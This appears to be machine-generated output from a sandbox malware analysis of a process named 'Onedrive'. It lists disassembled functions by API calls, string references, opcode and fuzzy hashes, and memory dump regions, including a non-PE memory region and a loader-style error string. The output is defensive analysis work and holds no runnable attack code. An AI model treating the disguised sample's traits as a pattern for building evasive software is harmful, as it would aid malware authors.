                                                    • String ID: %ls$Bad memory block found at 0x%p.$Bad memory block found at 0x%p.Memory allocated at %hs(%d).$_CrtMemCheckpoint$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp$state != nullptr
                                                    • API String ID: 1786109592-3601319530
                                                    • Opcode ID: 722345fc339e5307dad66cf511f6cbea81baa1efcc648aa63954b5faa99f4bf1
                                                    • Instruction ID: 8becb431c39b286ceaf9970e494290890c255ce25beb3d643c578b5ead28f0bb
                                                    • Instruction Fuzzy Hash: F3715136B18B4186DB24CB1AE4A1B3AB7A0F784754F210535EA9D57B98CF7DD445CB00
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                     • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$Free$Process$InformationLocalWindowsmemset
                                                    • String ID: Security-SPP-Action-StateData
                                                    • API String ID: 2630303489-3551652513
                                                    • Opcode ID: 7699336b6b7f282b642f77ab4554ed0c2efedfc1209a31443493f7247048ebea
                                                    • Instruction ID: 1edba009b896a467d6ef476498c85701444df1a6ba2099d82cfcd52116904b25
                                                    • Instruction Fuzzy Hash: B951BE32B08A5286EB15EBA194023BDA7A0FFB9788F444131FA4DD7785DF3CE5099760
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                     • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$Free$Alloc_vsnwprintf
                                                    • String ID:
                                                    • API String ID: 869350258-0
                                                    • Opcode ID: a95e66a2d486a7de2bc33df1643f9172f06d30cbe7a2b837ad745425032e1045
                                                    • Instruction ID: d0c296705264c2487fcd55b9dba5791ed0a7bd14b943ec049c20cee7e8992934
                                                    • Instruction Fuzzy Hash: B571B832F0CA6387EA256BE2644427D6691AFB9B85F454134FD0ED73C5EE3CE80D6260
                                                    Strings
                                                    • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed., xrefs: 00007FFDF3AEA705
                                                    • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 00007FFDF3AEA426
                                                    • DAMAGED, xrefs: 00007FFDF3AEA365
                                                    • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d)., xrefs: 00007FFDF3AEA6CE
                                                    • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 00007FFDF3AEA578
                                                    • %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d)., xrefs: 00007FFDF3AEA7D2
                                                    • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer., xrefs: 00007FFDF3AEA48E
                                                    • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer., xrefs: 00007FFDF3AEA5E0
                                                    • %hs located at 0x%p is %Iu bytes long., xrefs: 00007FFDF3AEA844
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %hs located at 0x%p is %Iu bytes long.$%hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d).$DAMAGED$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d).
                                                    • API String ID: 0-1381456093
                                                    • Opcode ID: 407bbe65323f13c1446eca2a6ba213da027fc83528b946b518c18121b60aee1a
                                                    • Instruction ID: 8b8b0109d92528cbead8706f406dcf2648fcd0fb6d3284b6954da02f4ffaf7be
                                                    • Instruction Fuzzy Hash: ADE11C36A18B8586D774CB1AE491B9EB7A0F788740F114535EBDD87BA9EF7CD4808B00
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(?,?,80070057,00007FF63EA1D826,?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA1E0D0
                                                    • HeapAlloc.KERNEL32(?,80070057,00007FF63EA1D826,?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA1E0E4
                                                    • memmove.MSVCRT(?,80070057,00007FF63EA1D826,?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA1E112
                                                    • GetProcessHeap.KERNEL32(?,?,80070057,00007FF63EA1D826,?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA1E13B
                                                    • HeapFree.KERNEL32(?,80070057,00007FF63EA1D826,?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA1E150
                                                    • GetProcessHeap.KERNEL32(?,?,80070057,00007FF63EA1D826,?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA1E186
                                                    • HeapFree.KERNEL32(?,80070057,00007FF63EA1D826,?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA1E19A
                                                    • GetProcessHeap.KERNEL32(?,?,80070057,00007FF63EA1D826,?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA1E1C7
                                                    • HeapFree.KERNEL32(?,80070057,00007FF63EA1D826,?,?,?,00000000,?,?,?,00007FF63EA1D0EA,?,?,00000000), ref: 00007FF63EA1E1DB
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                     • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$Free$Allocmemmove
                                                    • String ID:
                                                    • API String ID: 3442027419-0
                                                    • Opcode ID: 88bed13c918e7fb80d26cd8213454f113ac0d062ba6505f9c94ab16fab29db0b
                                                    • Instruction ID: 868a7e2e9c2e4d80210ba4b256fbb0ca34d555e0485b5da6b2b23e3431fc1e81
                                                    • Instruction Fuzzy Hash: 51419131B08A8287E6149F93A50017AAAA1FFB9BC5F09C038EE4E97745DF3CE4499311
                                                    APIs
                                                      • Part of subcall function 00007FF63EA19CD8: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF63EA1704B), ref: 00007FF63EA1A00D
                                                      • Part of subcall function 00007FF63EA19CD8: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF63EA1704B), ref: 00007FF63EA1A022
                                                      • Part of subcall function 00007FF63EA19CD8: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF63EA1704B), ref: 00007FF63EA1A036
                                                    • SysFreeString.OLEAUT32 ref: 00007FF63EA1714D
                                                    • GetProcessHeap.KERNEL32 ref: 00007FF63EA1715E
                                                    • HeapFree.KERNEL32 ref: 00007FF63EA17173
                                                    • PostThreadMessageW.USER32 ref: 00007FF63EA17194
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                     • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: FreeHeap$Process$LocalMessagePostStringThread
                                                    • String ID:
                                                    • API String ID: 4078191539-0
                                                    • Opcode ID: 2c7ef42b2d75275cada80261cee81969b4e4b5e5a8e0757516f127fcc49ae481
                                                    • Instruction ID: 84b58b0db9fd0bfd2ca4d95f1b3bf12b5c803fd1cc906ff2d5af91bff7750a80
                                                    • Instruction Fuzzy Hash: 0D41E421B0CB4686EB109BA1A400179B7A1FFB9B85F069135FE4EC7741DE3CE449A360
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                    • String ID:
                                                    • API String ID: 3140674995-0
                                                    • Opcode ID: 71c0df9b308b973dc3944309ceeef931511b359d5768c892c0b51a9535b78438
                                                    • Instruction ID: 68da518916d8283abba1dd30c3caf5de3a523e2a3a43146bd6f9a8736f810aac
                                                    • Instruction Fuzzy Hash: C6411432608B8586E7609B15F4643AAB7A5FB89740F51013ADADE5BBACEF3CC544CB00
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                     • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: 08ebd22da5110395b74469f9ffbac05240c56cf53d5b8b387743d881b31d9734
                                                    • Instruction ID: d6babe01613a9aeac76784d7149ce03222e652f2683dfc3c996d5e6471051f66
                                                    • Instruction Fuzzy Hash: 6F719132B08652CAEB049BA595442BD27E0FB68BC5F454539FE0ED3B98DF38D849D320
                                                    APIs
                                                    • FindResourceExW.KERNEL32(?,?,?,00007FF63EA1C0CB,?,?,00000000,00000000,ComplianceText,00007FF63EA1671B), ref: 00007FF63EA1BF89
                                                    • LoadResource.KERNEL32(?,?,?,00007FF63EA1C0CB,?,?,00000000,00000000,ComplianceText,00007FF63EA1671B), ref: 00007FF63EA1BFA6
                                                    • LockResource.KERNEL32(?,?,?,00007FF63EA1C0CB,?,?,00000000,00000000,ComplianceText,00007FF63EA1671B), ref: 00007FF63EA1BFBA
                                                    • GetLastError.KERNEL32(?,?,?,00007FF63EA1C0CB,?,?,00000000,00000000,ComplianceText,00007FF63EA1671B), ref: 00007FF63EA1C026
                                                    • GetLastError.KERNEL32(?,?,?,00007FF63EA1C0CB,?,?,00000000,00000000,ComplianceText,00007FF63EA1671B), ref: 00007FF63EA1C03C
                                                    • GetLastError.KERNEL32(?,?,?,00007FF63EA1C0CB,?,?,00000000,00000000,ComplianceText,00007FF63EA1671B), ref: 00007FF63EA1C052
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                     • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastResource$FindLoadLock
                                                    • String ID:
                                                    • API String ID: 2613642035-0
                                                    • Opcode ID: e014c53c1afe5e2e54386c9475865295f837bfc86f6c95a8f9d82f449c7950be
                                                    • Instruction ID: 9a37eb953cf037b900791e8bf294d6a229b4087d56cdf6d137bd7b881e02f7c7
                                                    • Opcode Fuzzy Hash: e014c53c1afe5e2e54386c9475865295f837bfc86f6c95a8f9d82f449c7950be
                                                    • Instruction Fuzzy Hash: A931A372B05B9186EB144F96A441239B7E0FFA9F81B059138EA4ED7350DF3CE448A720
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: HeapValidate__vcrt_lock
                                                    • String ID: Cycle in block list detected while processing block located at 0x%p.$Heap validation failed.$I'
                                                    • API String ID: 504802999-730636035
                                                    • Opcode ID: 13bc1b741afaa4ad0493144f1cd0678841a7d677c01badd364706483a96d8a92
                                                    • Instruction ID: 389196b3bd0f5be1cc9df4daade8e11651602419b1c8afe1bc17eb8cb017e275
                                                    • Opcode Fuzzy Hash: 13bc1b741afaa4ad0493144f1cd0678841a7d677c01badd364706483a96d8a92
                                                    • Instruction Fuzzy Hash: 2531413671CB8186E7608B2AE0A4B2A77A0F785780F515435E79D57BACDF3CD4808B00
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$CaptureContextCurrentDebuggerPresent__crt
                                                    • String ID: [!] 0x%0.8X Failed With Error: 0x%0.8X
                                                    • API String ID: 3997116924-2773923016
                                                    • Opcode ID: a971831d03344af9b790a42068994a9addd36eae4fb5173965852dd0a37b4df6
                                                    • Instruction ID: f121cb623c77db147d9a9a129f93102e1b6e008e2a7bdf7ffa6cde1ef9c59b0f
                                                    • Opcode Fuzzy Hash: a971831d03344af9b790a42068994a9addd36eae4fb5173965852dd0a37b4df6
                                                    • Instruction Fuzzy Hash: 4031E432609BC18AE770DB15E8647ABB7A0FB84355F410636D6AD57B98EF3CD5848F00
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000003.1837365304.000001729DD20000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001729DD20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_3_1729dd20000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $ $#$8$8$d
                                                    • API String ID: 0-424029278
                                                    • Opcode ID: 3561dfd99937bd88ee09da80c548b2101c97d58637f8026c2b2309ad77361765
                                                    • Instruction ID: 5fa72bfffb3381f6c619bcee79617ea9d7e1fab9799288ab428eeaafedae567e
                                                    • Opcode Fuzzy Hash: 3561dfd99937bd88ee09da80c548b2101c97d58637f8026c2b2309ad77361765
                                                    • Instruction Fuzzy Hash: AA72AC3151CB588FE7A8DF08C445BEAF7E1FB98308F58466ED18DC7291DB3495829B82
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(?,?,?,?,00007FFDF3AD329D,?,?,?,?,?,?,00007FFDF3AEEFA0), ref: 00007FFDF3AD319B
                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,00007FFDF3AD329D,?,?,?,?,?,?,00007FFDF3AEEFA0), ref: 00007FFDF3AD31A6
                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,00007FFDF3AD329D,?,?,?,?,?,?,00007FFDF3AEEFA0), ref: 00007FFDF3AD31AC
                                                    • TerminateProcess.KERNEL32(?,?,?,?,00007FFDF3AD329D,?,?,?,?,?,?,00007FFDF3AEEFA0), ref: 00007FFDF3AD31BA
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                    • String ID:
                                                    • API String ID: 3231755760-0
                                                    • Opcode ID: e17c61074ea742d8d2e34edeb5ed5bb4e075f1e8e48f4a5c1d6400f9c735111e
                                                    • Instruction ID: 14f6a989958b5f38a38ff99429e10cba07f2feb00dd05ac228fd602a4134fdf1
                                                    • Opcode Fuzzy Hash: e17c61074ea742d8d2e34edeb5ed5bb4e075f1e8e48f4a5c1d6400f9c735111e
                                                    • Instruction Fuzzy Hash: 8AD01220F18642D2D744BF31E8794292220BB85B01F914034CA9F19268CE3CD4598600
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000003.1837365304.000001729DD20000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001729DD20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_3_1729dd20000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $($6$BM
                                                    • API String ID: 0-1480521668
                                                    • Opcode ID: 2d8c12331ff5a7f698b7a0f75df302dc6d3f24d3f217a5fd4b89385f2d6db3ab
                                                    • Instruction ID: 6a61af767dc4f675a64328f039f6efdf9f9f6b8bd7658829ca3a56b8c2857029
                                                    • Opcode Fuzzy Hash: 2d8c12331ff5a7f698b7a0f75df302dc6d3f24d3f217a5fd4b89385f2d6db3ab
                                                    • Instruction Fuzzy Hash: 31A16D3521CB588FE764DF28C449BAAB7E1FB99304F050569E58AC73A0EF74D841CB92
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %ls$("Division by zero", false)$minkernel\crts\ucrt\inc\corecrt_internal_big_integer.h
                                                    • API String ID: 0-226933
                                                    • Opcode ID: b6acd8fb6b2147fab697d2cf9cd18a8739495131df0abd8c48eb14d6879e420b
                                                    • Instruction ID: 2f3b5515d9232c5b6062130a11290bc4dac3471dddd0f4293fceea7c7729f05d
                                                    • Opcode Fuzzy Hash: b6acd8fb6b2147fab697d2cf9cd18a8739495131df0abd8c48eb14d6879e420b
                                                    • Instruction Fuzzy Hash: 0052D7767096808BD764CF19E4A0B6AB7A1F7C8744F504125EA9ECBB98DB3DE844CF00
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcessmemmove
                                                    • String ID:
                                                    • API String ID: 459441494-0
                                                    • Opcode ID: a27ebb562d8cc982a7662c2533a1bef2f07e9f90c8f62cd5c03b61370cd8a582
                                                    • Instruction ID: 94a1305c05f17b2361b086ef79f7c8edc479b4839f7ae91a605fe9b23e616df0
                                                    • Opcode Fuzzy Hash: a27ebb562d8cc982a7662c2533a1bef2f07e9f90c8f62cd5c03b61370cd8a582
                                                    • Instruction Fuzzy Hash: AE41E723F0865686EE24ABA1A40007D6692BFB4B94F594135FE5DC7381DE3CE40EE260
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000003.1837365304.000001729DD20000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001729DD20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_3_1729dd20000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID: 0-3916222277
                                                    • Opcode ID: 04e19abc072cb432b3cdb3008cafd2c004a1f03d8c376199b394da96084127c1
                                                    • Instruction ID: 3d507df7442c74f1480d8c553e0eac39388f826af4d1746cbc277d4d0bc1f78d
                                                    • Opcode Fuzzy Hash: 04e19abc072cb432b3cdb3008cafd2c004a1f03d8c376199b394da96084127c1
                                                    • Instruction Fuzzy Hash: 98F166313189188FE784EB29C495BA673F2FB8C305F444468E68DC7296DF34E982DB52
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    • Opcode ID: b91bee5e328decbd5a4a70b1843fdfc0294844994040808bef8b895f383804b0
                                                    • Instruction ID: 2961f13e2ea21df349f8953ead9d99b42cd47b2ce34868da0d3e8bfe423930b0
                                                    • Opcode Fuzzy Hash: b91bee5e328decbd5a4a70b1843fdfc0294844994040808bef8b895f383804b0
                                                    • Instruction Fuzzy Hash: F7310D3661DA848ACBA0CB16E49476ABBA0F788744F505135EADE87B98DF3CD1508F00
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $
                                                    • API String ID: 0-3993045852
                                                    • Opcode ID: 93246ffeeb1bb3ddc22196d4ce7f8a2fa6ee99dbb0283524e9d2c137badd3ae2
                                                    • Instruction ID: 313571380487f563ab40b4adaf27eba3168f5673a7bea3fc6dc48dcf8b02a7a3
                                                    • Opcode Fuzzy Hash: 93246ffeeb1bb3ddc22196d4ce7f8a2fa6ee99dbb0283524e9d2c137badd3ae2
                                                    • Instruction Fuzzy Hash: 49D15D72B187018AE755CF29E862726B6E0F788354F454635EABDDB7D8DA3CE440CB04
                                                    APIs
                                                    • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF63EA1EBDB
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
